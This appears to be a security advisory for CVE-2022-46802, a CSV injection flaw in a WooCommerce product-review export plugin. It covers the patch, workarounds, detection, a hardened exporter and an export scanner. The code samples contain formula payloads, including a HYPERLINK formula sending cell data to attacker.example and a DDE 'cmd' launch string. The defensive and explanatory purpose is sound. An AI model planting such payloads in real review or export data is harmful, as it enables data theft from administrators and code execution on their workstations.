CVE-2022-46802
📋 TL;DR
Product Reviews Import Export for WooCommerce (version 1.4.8 and earlier) writes review data into its CSV export without neutralising cell content, so an attacker who can get text into a review (no authentication is needed to submit one) can plant spreadsheet formulas that are evaluated when a site administrator opens the exported file in Excel, LibreOffice Calc or a similar application. Note where the code runs: the formula executes on the workstation of whoever opens the export, not on the WordPress server. All WordPress sites running the plugin at 1.4.8 or earlier are affected.
💻 Affected Systems
- Product Reviews Import Export for WooCommerce WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Code execution on the workstation of the administrator who opens a poisoned export in a spreadsheet with DDE or external-link features enabled (typically after clicking through a security prompt), followed by theft of that administrator's credentials or session and, from there, full compromise of the WooCommerce store and its customer data. There is no direct remote code execution on the WordPress server itself.
Likely Case
Exfiltration of data from the opened spreadsheet (for example via HYPERLINK or WEBSERVICE formulas that send cell contents to an attacker-controlled host), phishing links planted in the export, and review data that is corrupted or misleading once rendered by a spreadsheet application.
If Mitigated
Limited to formula text sitting inertly in the exported file: harmless when the export is opened as plain text, through a text-import dialog with formulas disabled, or in a spreadsheet application that blocks external content and DDE. In no scenario is there server-side code execution.
🎯 Exploit Status
CSV injection is well documented and trivial to weaponise: a review field whose first character is =, +, -, or @ is enough, and public payload lists exist. Full impact requires user interaction: an administrator must export the reviews and open the file in a spreadsheet application, usually clicking through at least one security prompt. No working exploit is needed beyond submitting crafted review text.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.4.9 or later
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Go to Plugins → Installed Plugins.
3. Find 'Product Reviews Import Export for WooCommerce'.
4. Click 'Update Now' if available.
5. If no update appears, manually download version 1.4.9+ from WordPress.org and replace the plugin files.
🔧 Temporary Workarounds
Disable plugin
Applies to: all platforms. Temporarily disable the vulnerable plugin until it is patched (review import and export stop working while it is disabled):
wp plugin deactivate product-reviews-import-export-for-woocommerce
Restrict CSV uploads
Applies to: Linux (Apache). Block direct HTTP access to .csv files via a web application firewall or .htaccess. Understand the limits of this control: it only stops a browser fetching a static .csv file from the web root. It does not stop the plugin generating an export through PHP, and it does nothing to stop formula text entering review content, so on its own it is a weak mitigation. The directives below are Apache 2.2 syntax (served by mod_access_compat on 2.4); on a pure Apache 2.4 configuration use `Require all denied` in place of the Order/Deny pair.
# Add to .htaccess:
<FilesMatch "\.(csv)$">
Order Allow,Deny
Deny from all
</FilesMatch>
🧯 If You Can't Patch
- Disable the plugin completely and use alternative review management methods
- Implement strict input validation for all review content and neutralise any cell that begins with a formula trigger character (=, +, -, @, and also tab or carriage return, which some spreadsheet applications strip before deciding whether a cell is a formula) before it is written to the export
- Treat every export as untrusted: open it with a text editor or the spreadsheet's text-import dialog rather than by double-clicking, and never click through the external-content or DDE warnings a spreadsheet raises for it
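The neutralisation described above, as an added example that is not the plugin's own code: a minimal review exporter in the style of the vulnerable behaviour (cells written exactly as submitted) beside a hardened version that prefixes a single quote to every cell whose first non-whitespace character is a formula trigger, so that Excel and LibreOffice treat it as text. The sample reviews, column names and function names are constructed for the example and are assumptions, not data or identifiers from the plugin.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice Calc and similar applications
# evaluate a cell as a formula. Tab and carriage return are included because
# some applications strip them before deciding whether the cell is a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample reviews (not real data). Rows two to four carry payloads
# of the kind an unauthenticated reviewer could submit.
SAMPLE_REVIEWS = [
    {"product": "Widget", "rating": 5, "reviewer": "alice", "review": "Great widget"},
    {"product": "Widget", "rating": 1, "reviewer": "mallory",
     "review": '=HYPERLINK("https://attacker.example/?c="&A1,"click for support")'},
    {"product": "Gadget", "rating": 3, "reviewer": "bob", "review": "\t=1+1"},
    {"product": "Gadget", "rating": 4, "reviewer": "-carol", "review": "@SUM(1,2)"},
]

# Assumed export column layout; the real plugin's layout is not shown on this page.
COLUMNS = ("product", "rating", "reviewer", "review")


def neutralize_cell(value):
    """Return `value` as text that a spreadsheet will not evaluate as a formula.

    A leading single quote forces text interpretation in Excel and LibreOffice.
    It is added to any cell whose first non-whitespace character is a trigger,
    so negative numbers such as "-1" are prefixed too; that is the price of a
    rule simple enough to apply to every exported cell. Quoting of embedded
    commas and double quotes is left to the csv writer.
    """
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_reviews_unsafe(reviews):
    """Export reviews exactly as submitted (the behaviour the patch removes)."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(COLUMNS)
    for review in reviews:
        writer.writerow([review[col] for col in COLUMNS])
    return buf.getvalue()


def export_reviews_safe(reviews):
    """Export reviews with every cell neutralised before it reaches the file."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(COLUMNS)
    for review in reviews:
        writer.writerow([neutralize_cell(review[col]) for col in COLUMNS])
    return buf.getvalue()


def read_cells(csv_text):
    """Parse CSV text back into a list of rows, the way a spreadsheet would."""
    return list(csv.reader(io.StringIO(csv_text)))


if __name__ == "__main__":
    print("--- unsafe export ---")
    print(export_reviews_unsafe(SAMPLE_REVIEWS))
    print("--- safe export ---")
    print(export_reviews_safe(SAMPLE_REVIEWS))
```

The hardened exporter deliberately applies the rule to every column, including the reviewer name, because an attacker controls that field as well as the review body. If the export must remain numerically usable, exempt only columns the plugin itself generates (ratings, IDs, dates) and never any free-text field.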
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Product Reviews Import Export for WooCommerce. A version of 1.4.8 or lower is vulnerable.
Check Version:
wp plugin get product-reviews-import-export-for-woocommerce --field=version
Verify Fix Applied:
Confirm the plugin version is 1.4.9 or higher in the WordPress admin panel, or rerun the wp-cli command above. Exports produced before the update remain untrusted; delete or re-generate them.
📡 Detection & Monitoring
Log Indicators:
- Review submissions (wp_comments rows of type review) whose content or author field begins with =, +, -, @, a tab or a carriage return
- Bursts of review submissions from one client, or many reviews with near-identical formula-looking bodies, which suggests automated payload spraying
- Exported CSV files containing cells that begin with those characters, or that reference HYPERLINK, WEBSERVICE, DDE or cmd
Network Indicators:
- POST requests to /wp-comments-post.php (the standard WordPress comment and review submission endpoint) from unauthenticated clients carrying formula syntax in the body
- Requests to the plugin's export endpoint (admin-ajax.php or the plugin's own path) from unexpected sessions, and CSV downloads from unexpected sources
- Outbound connections from administrator workstations to unfamiliar hosts shortly after a review export is opened
SIEM Query (generic field names; adapt to your schema, and expect the plugin-path clause to be noisy on a busy store):
source="wordpress" AND (uri_path="/wp-content/plugins/product-reviews-import-export-for-woocommerce/*" OR uri_path="/wp-comments-post.php" OR file_extension="csv")
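The "CSV files with formula characters" indicator above, as an added example that is not part of the original advisory or the plugin: a scanner that walks an existing export, reports every cell a spreadsheet would evaluate using a spreadsheet-style reference so an analyst can jump to it, and pulls out the hosts the formulas would contact as indicators for outbound-traffic hunting. The export content, column names and the attacker.example host are constructed for the example and are assumptions.

```python
import csv
import io
import re

# Leading characters that make a spreadsheet evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Functions that appear in typical CSV injection payloads (not an exhaustive list).
SUSPICIOUS_FUNCTIONS = re.compile(r"\b(HYPERLINK|WEBSERVICE|IMPORTXML|DDE|cmd)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"')]+")

# Constructed export file (not a real export). Rows 3 to 6 contain injected
# content: an exfiltration link, a tab-prefixed formula, a trigger character in
# the reviewer name, and a DDE launch string.
SAMPLE_EXPORT = (
    "product,rating,reviewer,review\r\n"
    "Widget,5,alice,Great widget\r\n"
    'Widget,1,mallory,"=HYPERLINK(""https://attacker.example/?c=""&A1,""click for support"")"\r\n'
    'Gadget,3,bob,"\t=1+1"\r\n'
    'Gadget,4,-carol,"@SUM(1,2)"\r\n'
    'Gizmo,2,dave,"=cmd|\' /C calc\'!A0"\r\n'
)


def column_label(index):
    """Convert a 0-based column index to spreadsheet letters (0 -> A, 26 -> AA)."""
    label = ""
    index += 1
    while index:
        index, rem = divmod(index - 1, 26)
        label = chr(ord("A") + rem) + label
    return label


def scan_export(csv_text):
    """Return one finding per cell that a spreadsheet would evaluate as a formula.

    Each finding carries the cell reference, the raw content, any URLs the
    formula would contact and the suspicious functions it calls. Negative
    numbers such as "-1" are flagged as well, so hits in numeric columns are
    expected noise rather than a parser bug.
    """
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for col_no, cell in enumerate(row):
            if not cell.lstrip().startswith(FORMULA_TRIGGERS):
                continue
            findings.append({
                "cell": f"{column_label(col_no)}{row_no}",
                "content": cell,
                "urls": URL_RE.findall(cell),
                "functions": sorted({m.upper() for m in SUSPICIOUS_FUNCTIONS.findall(cell)}),
            })
    return findings


def indicators(findings):
    """Collapse findings into a sorted, de-duplicated list of contacted hosts."""
    hosts = set()
    for finding in findings:
        for url in finding["urls"]:
            hosts.add(re.sub(r"^https?://", "", url).split("/")[0])
    return sorted(hosts)


if __name__ == "__main__":
    results = scan_export(SAMPLE_EXPORT)
    for finding in results:
        print(finding["cell"], finding["functions"], finding["urls"], repr(finding["content"]))
    print("hosts to hunt for:", indicators(results))
```

Run it against a real export with `scan_export(open(path, newline="").read())`; feed the host list from `indicators()` into the proxy or DNS search that matches the "outbound connections from administrator workstations" indicator above.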
🔗 References
- https://patchstack.com/database/vulnerability/product-reviews-import-export-for-woocommerce/wordpress-product-reviews-import-export-for-woocommerce-plugin-1-4-8-unauth-csv-injection-vulnerability?_s_id=cve